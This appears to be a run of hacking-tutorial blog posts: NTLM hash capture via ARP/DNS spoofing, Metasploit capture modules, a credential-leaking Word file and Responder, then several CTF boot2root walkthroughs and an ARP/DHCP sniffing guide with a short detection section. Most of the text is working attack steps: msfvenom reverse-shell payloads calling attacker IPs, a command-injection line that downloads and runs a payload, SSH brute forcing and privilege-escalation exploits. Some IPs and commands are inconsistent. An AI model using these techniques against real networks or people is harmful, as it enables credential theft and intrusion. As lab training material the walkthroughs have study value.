Hello friends! Today we are describing how to capture NTLM Hash in a local network. In this article we had captured NTLM hash 4 times through various methods. Before we proceed towards attacking techniques, let’s read the brief introduction on NTLM Hash.

The acronym for word NTLM is made by combining following terms:

NT: New technologies (Windows)

LAN: Local area network

M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols. It was the default for network authentication in the Windows NT 4.0 operating system that provides authentication, integrity, and confidentiality to users. The NTLMv2 is the latest version and uses the NT MD4 based one way function.The hash lengths are 128 bits and work for local account and Domain account.

The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through Sniffing

Being as attacker open etter.dns file from inside /etc/ettercap in your Kali Linux system then replace whole text by editing given below line includes attacker’s IP and save the text document.

* A 192.168.1.103

Now follow the given bellow step to run ettercap to start sniffing.

· Application > sniffing and spoofing > ettercap

· Click on sniff and Select your network interface.

· Scan for host to generate target list.

Select the host and add to target, from given image you read among 5 hosts I had chose 192.168.1.101as target and add to target 1.

Click on MITMfrom menu bar to select ARP Poisoning, a dialog box will pop-up now enable “sniff remote connects” and click ok.

After then click on pluginsoption from menu bar and choose dns_spoof

By making use of dns_spoof attacker can redirect victim’s network traffic on his network IP, so that whatever victim will open on his web browser will get redirect on attacker’s IP.

Now load metasploit framework and execute following code to make use of http_ntlm module.

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

Now according to above trap set for victim this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “hackingarticles.in” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!!The attacker had captured NTMLv2 hash, now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username:pentest

Machine name: Desktop-UKIQM20

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet's broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can port 137 is open for NetBIOS network service.

Now victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to demonstrate that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username:pentest

Machine name:Desktop-UKIQM20

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & word UNC injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) >set lhost 192.168.1.103

msf auxiliary(word_unc_injector) >exploit

It has created an empty docx file under given path /root/.msf4/local/

Now send this msf.docx file to victims and again run capture smb module in metasploit framework as done priviously.

From given below image you can observe that in order to get the hashes the auxiliary/server/capture/smb module has been used.

As the victim will open msf.docxfile, again the attacker had captured NTMLv2 hash on his system. The only difference between above two attacks and in this attack is that here we had only captured NTLMv2 hash.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Responder

NBT-NS/LLMNR Responder Created by Laurent Gaffie which is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server that can perform above all attacks. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it gets downloaded execute following command to run the python script.

python Responder.py –I 192.168.1.103 -I eth0

From specified image you can perceive that all poisoners and server services gets ON.

Now again victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to display that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake network error alert prompt, as shown in given below image.

Once again the attacker had successfully captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username:pentest

Machine name:Desktop-UKIQM20

It will store captured NTLM hash in a text document under given /root/Desktop/Responder/logs.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Wonderful! These were the four ways to trap the target user in order to capture NTLM hash.

↧

Hack the Lazysysadmin VM (CTF challenge)

October 17, 2017, 11:05 am

≫ Next: Hack the Bulldog VM (Boot2Root Challenge)

≪ Previous: 4 ways to Capture NTLM Hashes in Network

Hello friends! Today we are going to take another CTF challenge known as Lazysysadmin. The credit for making this vm machine goes to “Togie Mcdogie” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.124

We find port 139 and port 445 is open, so we use smbclientto look for shared disk.

Smbclient -L 192.168.1.124

After finding the shared drive we use smbclient to access the shared folder.

smbclient '\\192.168.1.124\share$'

Searching through the files we find wordpress folder. In the wordpress folder, we download the wp-config.php file to find the password and username.

In the wp-config.php file we find the username and password for wordpress login.

Now we use dirb to find the wordpress page, as the default page on the server is not based on wordpress.

dirb http://192.168.1.124

Now after finding the wordpress page we open admin login page. We access the admin dashboard using the username and password we found earlier in the wp-config.php file.

We then create a php payload using msfvenom and replace the 404.php page in themes with the code of our payload.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw

We set up our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > run

We then call the 404.php page to start our session. The 404.php page can be found in /wp-content/themes/twentyfifteen/404.php

As soon as our payload is executed we get our reverse shell.

After searching through the files we didn’t find anything so we go back to the shared folder and in that we download a file called deets.txt

When we open the file we find password some user.

We open the /etc/passwd file on the VM to find the name of the users.

When we switch users we are prompted by an error message to use terminal, so we spawn /bin/bash using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Then we switch user to togie and use the password we find in deets.txt file

su - togie

We then look into sudoers and find that we have all the privileges of root user so we switch to root.

So we switch to root and go into root folder. There we find a file called proof.txt, we open the file and are greeted with a message congratulating for the completion of the CTF challenge.

↧

Hack the Bulldog VM (Boot2Root Challenge)

October 18, 2017, 7:46 pm

≫ Next: Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

≪ Previous: Hack the Lazysysadmin VM (CTF challenge)

Hello friends! Today we are going to take another CTF challenge known as Bulldog. The credit for making this vm machine goes to “Nick Frichette” and it is another Boot2root challenge. Our goal is to get into root directory and see the congratulatory message. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.158 as network IP; now using nmap lets find out open ports.

nmap -sV 192.168.1.158

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.158/

We find quite a few directories, we open http://192.168.1.158/dev/ for information. We didn’t find anything on the web page, so we take a look at the source code of the page. There we find a few passwords in md5 hash encryption for the respective users.

We are able to only crack the last 2 hashes and find 2 strings ‘bulldog’ and ‘bulldoglover’.

We open the admin page we found using dirb. We now use one of these hashes as password and we take the respective username.

We use username as ‘nick’ and password as ‘bulldog’.

After logging in we go to http://192.168.1.107/dev/shell that we found using dirb. We find that it Is a command shell that allows us to execute certain commands. We can easily bypass this firewall using ‘|’ to run multiple commands.

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 > /var/www/html/shell.py

We setup our listener using metasploit for reverse shell.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.111

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload python/meterpreter/reverse_tcp

msf exploit(handler) > run

We now upload our payload to the server and execute the payload to get reverse shell.

pwd | wget http://192.168.1.111/shell.py | python shell.py

As soon as we execute our payload we get our session on metasploit.

We spawn a shell using python to execute our command.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Looking through we find a file customPermissionApp in /home/bulldogadmin/.hiddendirectory/.

We use strings command to take a look at the strings inside customPermissionApp.

strings customPermissionApp

We find a string called SUPERultHimatePASHSWORDyouHCANTget,we remove ‘H’ from the string and use this as our password to get access as root.

sudo su

Then we move to root folder inside the root folder we find a file called ‘congrats.txt’. When we open the file we are greeted by a message congratulating us for the completion of the VM challenge

↧

Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

October 19, 2017, 8:49 am

≫ Next: Hack the BTRSys1 VM (Boot2Root Challenge)

≪ Previous: Hack the Bulldog VM (Boot2Root Challenge)

Born2Root is boot2root challenge developed by ‘ismailonderkaya’ in the series of BRTSys. This is an amazing lab for practice which has covered every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target. And for that use the following command.

netdiscover

We know our target is 192.168.0.106 so, therefore, apply nmap on it as it will help us know which ports and services are open. Use the following command:

nmap -A 192.168.0.106

Due to nmap you can see that port 21, 22 and 80 are open with the service of FTP, SSH and HTTP respectively. As we still have a lot to find about this, we decided to use DIRB. Dirb is web-scanner i.e. it will scan the whole web application for file/directories. It will even show the hidden files. Use the following command:

dirb http://192.168.0.106

As you can see in the above image that using dirb we found various files and directories such as robots.txt, upload, etc. but you can also see that our target web application is using wordpress, so, we can easily apply a wordpress scan using the following command which covers themes, plugins and users:

./wpscan.rb -u http://192.168.0.106/wordpress/ --enumerate at –enumerate ap –enumerate u

As a result we have found two users – btrisk and admin.

Now if you try to login through admin using password admin you have the access of the dashboard. And once you have that access you can execute a malicious PHP code there in to have a meterpreter session. Use the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you a php code which you have to execute. Copy the code from and paste it in the template as shown below :

Once the code is uploaded, execute it through URL as shown :

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before executing the above URL, make sure that your meterpreter handler is active. And to do so; go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 444

exploit

Once the handler is active and url is executed, you will have your session. Let’s check the system’s information which we have entered and for this type:

sysinfo

Now let’s get into shell by simply typing:

shell

Through shell we came to know that Ubuntu’s version is 16.04.2 and fortunately there is exploit in exploit-db for this version of ubuntu. Download this exploit.

This exploit will help you to have achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it and for that type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it in the /tmp directory. For that you will need to go to /tmp directory. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now got o shell>/tmp and give the permission to the exploit rootshell and the execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are in the root. And so our Boot2Root challenge is complete.

↧

Hack the BTRSys1 VM (Boot2Root Challenge)

October 21, 2017, 8:57 am

≫ Next: Hack the RickdiculouslyEasy VM (CTF challenge)

≪ Previous: Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

BTRSys v1 is another lab by ‘ismailonderkaya’ in the series BTRSys. This lab helps you sharpen your skills as a pentester. It is a must lab for a beginner.

Difficulty level: Beginner

WalkThrough

Let’s start with finding our target as always by using the following command:

netdiscover

Now as we know our target is 192.168.0.105. Let’s use nmap on it. We all know nmap has many type of scans but aggression scan is much better as it combine and gives all the information at once.

nmap -A 192.168.0.105

Through nmap we know that port 21, 22 and 80 are open with the services of FTP, SSH and HTTP respectively. As nmap hasn’t told us much; we shall dig deeper by using nikto. Nikto is open-source web server scanner which allows you look for dangerous files/programs, outdated versions, index files, http server options, etc. to use nikto type :

nikto -h http://192.168.0.105

With the help of nikto we know that there is login page à /login.php

Let’s go the login page by typing the following in URL:

192.168.0.105/login.php

So now we in on login page but we do not have credentials to log in. Let’s check its page source.

Now in the page source if you observe the function control carefully, you’ll realise that username ends with @btrisk.com so, therefore we can use SQL injection here and for that use the following steps:

Use bruteforce to apply SQL injection. (When asked for text file for bruteforce, select the one with the list of all sql injection commands)

After the completion of brute force it will give the correct sql code which will help you login as shown in above image.

Right click on that code and select ‘Show response in browser’ as shown above. This will open the browser and you will find yourself automatically logged in.

As we are logged in, there is an option to upload a file. Here, we can upload our malicious php code. To generate the code go to the terminal of kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw

Copy the code from to die(); and save it in .txt file. After saving change the extension from .txt to .php and then upload it.

When you try to upload your .php file it will show that only jpg and png files can be uploaded. Okay! So now change the extension from .php to .jpg and then upload it but when you upload it remember to capture the request in burpsuite.

Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.

Our malicious file I s uploaded but we yet have to find the directory where it was uploaded so we can execute it and have our session. Therefore, next we will use DIRB. And for that type:

dirb http://192.168.0.105

Dirb has shown us that there is a directory named uploads so obviously there our file has been uploaded. To execute the file type the following in the URL:

192.168.0.105/uploadsd/shell/php

Like always before executing the file remember to activate your handler on Metasploit so that you can have your session. And for this open Metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.162.0.107

set lport 4444

exploit

After the handler is activated and your file is executed; you will have your meterpreter session. Let’s then further check system information and for that type:

sysinfo

Now that we have meterpreter session let’s explore a bit and look into html files:

cd /var/www/html

There is a config.php file in var/www/html. This file has often proven to be important so let’s check it out.

cat config.php

Through config.php we know that one of the following words is a username and password :

root

toor

deneme

Let’s now go to shell and try to log in through these three keywords :

shell

mysql -uroot -p -Ddeneme

And then enter password toor

Once logged in let’s look for tables by using following command :

show tables;

As shown in above image there is table named user. Let’s see what this table has :

select * from user;

From the table we now know that password for root is asd123***. Let’s log in from it :

su root

asd123***

Let’s confirm our root access :

whoami

↧

Hack the RickdiculouslyEasy VM (CTF challenge)

October 21, 2017, 9:40 am

≫ Next: Hack the H.A.S.T.E. VM (CTF challenge)

≪ Previous: Hack the BTRSys1 VM (Boot2Root Challenge)

Hack the RickdiculouslyEasyVM (CTFchallenge)

Hello friends! Today we are going to take another CTF challenge known as RickdiculouslyEasy. The credit for making this vm machine goes to “Luke” and it is another capture the flag challenge. Our goal is to capture flags and get 130 points in total to complete the challenge. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.107 as network IP; now using nmap lets find out open ports.

nmap -p- -A 192.168.1.107

By doing the nmap scan we find port 21, 80, 9090, 13337, 22222, 60000 open. Our nmap scan also shows that anonymous login is available on ftp port.

We enumerate the open ports further using netcat and found 2 flags.

nc 192.168.1.107 13337

nc 192.168.1.107 60000

We opened port 9090 in web browser and find third flag.

Now we use dirb to list the directories, as port 80 is open.

dirb http://192.168.1.107/

Using dirb we found a page http://192.168.1.107/passwords/. When we open it we find two files ‘flag.txt’ and ‘passwords.html’

When we open ‘FLAG.txt’ we find another flag.

Now we open the file, inside the file is password to some user.

Nmap scan showed that ftp is vulnerable to anonymous login. So we login ftp using username and password as anonymous.

When we access ftp we get a file called FLAG.txt, we open it and find another flag.

We open robots.txt and find link to two files root_shell.cgi and tracertool.cgi

http://192.168.1.107/cgi-bin/tracertoll.cgiis vulnerable to command injection.

We find that few commands have been filtered we use more command to get the name of the users in /etc/passwd file.

more /etc/passwd

Now we login using ssh using username Summer and password winter that we found earlier.

ssh -p 22222 Summer@192.168.1.107

After connecting to ssh we find a file called FLAG.txt and inside the file we find another flag.

Now searching through the files we came across an image and zip file inside Morty/ directory. We download the files into our system through ssh.

scp Safe_Password.jpg root@192.168.1.111:/root/Desktop

scp journal.txt.zip root@192.168.1.111:/root/Desktop

After download the files we use strings to find if something is hidden inside the image file, and we find the password for unzipping journal.txt.zip file

strings Safe_Passwords.jpg

After unzipping the zip file, we open the cat file and find another flag.

Back at the target VM we find an executable file called ‘safe’ we try to run it but we don’t have permissions to run it. So we download the file to our system.

scp safe root@192.168.1.111:/root/Desktop

Now when we run the file it asks for argument. we use the string found inside the last flag and we get a hint for a password for user RickSanchez

As the password contains 1 uppercase character, 1 digit followed by one of the word in the name of the band of Rick Sanchez. We use crunch to create a dictionary. We find that the name of the band in which rick played was called ‘the flesh curtains’.

crunch 10 10 -t ,%Curtains -o /root/Desktop/pass.txt

crunch 7 7 -t ,%Flesh –o /root/Desktop/pass1.txt

After creating the dictionary, we use dymerge to combine the both dictionary to form a single dictionary.

python dymerge.py /root/Desktop/pass.txt /root/Desktop/pass1.txt -s -o /root/Desktop/password.txt

Now that our dictionary is ready we bruteforce ssh using metasploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.1.107

msf auxiliary(ssh_login) > set rport 22222

msf auxiliary(ssh_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(ssh_login) > set username RickSanchez

msf auxiliary(ssh_login) > run

After successfully brute-forcing ssh, we spawn terminal using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)

After spawning the terminal, we take a look at the sudoers list. We find that we have all the privileges of root.

We switch to root user then move to /root/ folder. Inside the /root/ folder we find a file called FLAG.txt, when we open the file we find our final flag.

↧

Hack the H.A.S.T.E. VM (CTF challenge)

October 21, 2017, 11:47 am

≫ Next: Compressive Guide to Sniffing

≪ Previous: Hack the RickdiculouslyEasy VM (CTF challenge)

Hello friends! Today we are going to take another CTF challenge known as ‘H.A.S.T.E.’. The credit for making this vm machine goes to “f1re_w1re” and it is a unique challenge as we just have to get a reverse shell just to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.102 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.0.102

We find port 80 is open, so we open the ip address in our browser.

We don’t find anything on the page so we use dirb for listing directories on the web server.

dirb http://192.168.1.102

Now when we open http://192.168.0.102/ssi we get a hint that the website maybe vulnerable to server side injection.

Now when we open http://192.168.0.102/index we find the code executed by the server.

Now we go back to http://192.168.0.102/ and use server side injection to execute our commands.

We executed ‘ls -al’ command to check if it is working, as u can see in the image below we successfully ran our command.

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktp/shell.py

Now we upload our shell to the server using server side injection.

After successfully uploading the shell we use server side injection to execute our payload.

We setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler)> set payload python/meterpreter/reverse_tcp

msf exploit(handler)> set lhost 192.168.0.107

msf exploit(handler)> set lport 4444

msf exploit(handler)> run

As soon as we execute our payload we get reverse shell. The main objective of the challenge was to get a reverse shell.

↧

Compressive Guide to Sniffing

October 26, 2017, 8:44 am

≫ Next: MSSQL Penetration Testing with Metasploit

≪ Previous: Hack the H.A.S.T.E. VM (CTF challenge)

ARP Protocol

The Address Resolution Protocol (ARP) is a communications protocol used for discovering the link layer address associated with a given Internet layer address, a critical function in the Internet protocol suite. ARP was defined by RFC 826 in 1982, and is Internet Standard STD 37. ARP is also the name of the program for manipulating these addresses in most operating systems.

ARP is used for mapping a network address (e.g. an IPv4 address) to a physical address like an MAC address. For more detail visit Wikipedia.org.

Requirement:

1. Kali Linux Machine

2. Windows Machine

3. Local Area Network

4. EtterCap tool

5. VM running Metasploitable

6. Wireshark (Protocol Analyzer)

7. XArp tool

8. FTP Client

9. Putty Client

ARP Protocol Process

Address Resolution Protocol is in many ways similar to a domain name service (DNS). As DNS resolves known domain names to an unknown IP address, similarly an ARP resolves known IP addresses to unknown MAC addresses, as shown below in given image

If we observe by the above image; IP address 192.168.1.102, wants to communicate to IP address 192.168.101, but does not know its physical (MAC) address. An ARP request is broadcasted to all systems within that network, including IP X.X.X.100, X.X.X.101, and X.X.X.103. When IP address X.X.X.101 receives the message, it replies back via unicast with an ARP reply. This response contains the physical (MAC) address of BB-BB-BB-BB-BB-BB as shown above, this ARP reply information is then placed in the ARP cache and held there for a short duration, to reduce the amount of ARP traffic on the network, The ARP cache stores the IP, MAC, and a timer for each entry. The timer's duration many vary depending upon the Operating system in use, i.e., Windows operating system may store the ARP cache information for 2 minutes compare to a Linux machine which may retain it for 15 minutes or so.

Let us now begin with exploiting the ARP protocol to our advantage!!!

Scenario:Let us take the below scenario, where we will use 2 windows host machines Representing Host A and Host B as Victim and Kali Linux Host C used to target the victim's. In following image you can see attacker has lunch arp poisoning attack which has poisoned the arp table by adding attacker Mac address with both HOST’s IP A & B.

Let’s Begin the ARP Poisoning Attack

The First step is to clear the ARP Cache of both the host by typing following command in command prompt arp -d for Host A, then Ping the Host A for reply, now type command arp -a, this will show you the physical (MAC) address of the Host A Machine .

Start Sniffing with Ettercap

Let us now start to exploit both Host A and Host B, from Host C machine, which is our Kali Linux, start sniffing with Ettercap tool as shown in the below image on Kali.

Go to Sniff and select Unified sniffing.

Select the Network interface as appropriate, in this case it is eth0, click on OK

Now go to the Hosts Tab and Select Scan for Hosts as shown below to scan the connected system in a local network.

You will get the host list of all the scan hosts as shown below, let us now select our Targets from the host list X.X.X.101 and X.X.X.102, now add both the targets one by one by clicking on the tab Add to Target 1 and 2 respectively, from the given image we can see that both the targets are now added to our list.

Now go to Mitm (Man in the middle) and select ARP Poisoning. A Dialog box will appear for optional parameters.

Check the box "Sniff remote connection" and click OK

Go to start tab and click on start sniffing to target the Host A and B added.

Now let us go to our Kali machine and open the terminal, let us now type command ifconfigto determine our IP address and physical (MAC) address, in our case it is 00:0c:29:5b:8e:18 as highlighted in given image

Since we have started the arp poisoning attack on both the victim machine X.X.X.101 and 102 from our kali machine, if we go to any host and type arp -a on the command prompt, you will clearly see that the physical (MAC) address of the victim machine has changed to the physical (MAC) address of the kali machine, as shown above, Physical (MAC) address of both the IP X.X.X.102 and X.X.X.107 are same, which means that all the traffic from host X.X.X.102 is passing through Kali machine X.X.X.107

Demonstrate Mimt with Wireshark

Let us now Open Wireshark on our kail machine and analyze the packets, let us filter the packets by typing the following command icmp && (eth.sec = = 00:0c:29:5b:8e:18 || eth.dst == 00:0c:29:5b:8e:18), here in the command eth.sec means (Ethernet source) and eth.dst means (Ethernet destination), the MAC address are common in both source and destination which is the physical MAC address of our Kali machine, what we see is the source IP X.X.X.102 and destination X.X.X.101 are getting captured by the Kali machine which has a Physical (MAC) address 00:0c:29:5b:8e:18, hence proving successful sniffing of the victim machine.

Combining DNS Spoofing with sniffing

Let us now exploit both of our victim machines with DNS Spoofing attack

From your Kali machine go to the path: /root/etc/ettercap/etter.dns, open the file and remove any content if available, after then type the value * A (your Kali Linux IP address) as shown below and save the file.

Next step is to go to the ettercap tool and select plugins and click on manage the plugins as shown below:

Now select dns_spoof plug-in, once selected you will see (*) sign on the said plug-in.

Now if from the victim machine we type the command ping www.google.com, you will observe that the reply is getting received from IP X.X.X.107 which is the IP for our Kali machine, which means that the kali machine has become the DNS server for the victim machine.

Let us now add one more plug-in the same way we added dns_spoofing plug-in, this time we will use remote browser plug-in as shown in the image below. Once this plug-in get added, you can capture all the browser activity performed by the victim on his browser including user name and passwords.

Capturing NTLM passwords

Open kali terminal and type msfconsole, once the console starts type: search http_ntlm, now type: use auxiliary/server/capture/http_ntlm as shown in the below image:

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.0.107

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

From given below image you can notice victim is trying to browse “imdb.com” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash; now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username: raj

Machine name: WIN-1GKSSJ7D2AE

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm, we have successfully decoded the captured hashes with user name as raj and password as 123.

Combining DHCP Spoofing with sniffing

DHCP spoofing: A fake DHCP server is setup by attacker in a local network, which broadcast a large number Request message of false IP configuration to genuine Client.

Go to ettercap and click on Mitm, select DHCP spoofing

Form the below image, provide the necessary information

· IP Pool - 192.168.0.200-210 (put and IP range to issue IP to the system connected to the network, this will work as DHCP server)

· Netmask 255.255.255.0 (as per the IP Class)

· DNS Server IP 192.168.0.1 (as per the IP Class)

Click OK and Start sniffing

Here I have turn on the “metasploitable server” given below image shows the IP 192.168.0.202 which is from the pool of IP range we provided on ettercap DHCP.

Let us now go to the client machine and try to connect the metasploitable server with FTP (File Transfer Protocol)client as shown in the below image

Provide the host name (IP), user name and password to connect to the FTP server.

From the given below image we can see that, the information such as username and password for FTP is getting captured by ettercap provided by the host machine, in our case it is User:msfadmin, PASS:msfadmin

From given below image you can perceive that now we are trying to connect with metasploitable server (192.168.0.202) through telnet via port23 using putty. it will prompt you for the user name and password, provide the necessary information .

From the above image we can clearly see that ettercap has captured the credential information been provide by the user in our case it is User:msfadmin Pass: msfadmin for telnet service.

HTTP Password Sniffing

Let us now do the same through HTTP (Hypertext Transfer Protocol)

From the below image, we can see dvwa service is running in our metasploitable server, through the client browser let us type 192.168.0.202/dvwa/login.php, it will prompt for username and password, lets provide the credentials.

We could see from the below image, ettercap has once again captured the username and password been provide by the user from browser, in our case it is username: admin and PASS: password for HTTP service.

SMTP Password Sniffing

Lastly let us now try this with SMTP (Simple Mail Transport Protocol) Sniffing.

First step is to configure SMTP Server in your environment please click Here as to how we can configure SMTP server in windows machine.

Once the Server is configured, and we have setup email clients on the target machines,

Let us open Ettercap and add both our Targets X.X.X.102 and X.X.X.104 and select ARP poisoning

Now let us send an email from Target A to Target B as shown below

Here target A: raj@pentestlab.localis sender who is sending message to target B: aarti@pentestlab.local and hence port 25 for SMTP service will get in action.

Given below image has confirm that Aarti has received raj’s mail successfully, while at background attacker is sniffing all the traffic passes through router.

If we now go to Ettercap console, we can clearly see that it has successfully sniffed the traffic between Target A and Target B and captured the credential of Target A (Raj) as shown in above image.

Capture Email of SMTP server with Wireshark

Go to wire shark are put the filter smtp && (eth.src == 00:0c:29:4a:47:75 || eth.dst == 00:0c:29:4a:47:75) the MAC address filter is for our kali machine, you will observe it has captured packets from both our target Machines.

It has sniff every all SMTP packets , captured the both email IDs i.e. sender and receiver with message been sent to Target B which is Hello Friends today we are performing smtp sniffing , which shows that we have been successful on our attack on the selected targets, as shown in image below.

Throughout this article, we discussed around ways and techniques that can be used to exploit the Arp protocol successfully, let us now discuss briefly around the technique to be used to detect the arp attack.

Arp attack Detection

There are various tools available to detect the arp attack, one of the most common tools is XArp tool,which we will be using for this article.

We can run this tool in any host machine in the network to detect the arp attack, above image shows the affected systems on the network highlighted in red (X), we can disconnect these host from the network and decide upon next course of action to mitigate these risk by implementing the following controls:

Dynamic address inspection
DHCP snooping
VLAN hopping prevention

↧

MSSQL Penetration Testing with Metasploit

October 28, 2017, 9:28 am

≫ Next: WiFi Exploitation with WifiPhisher

≪ Previous: Compressive Guide to Sniffing

Hello friends today we are performing MSSQL penetration testing using metasploit framework in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

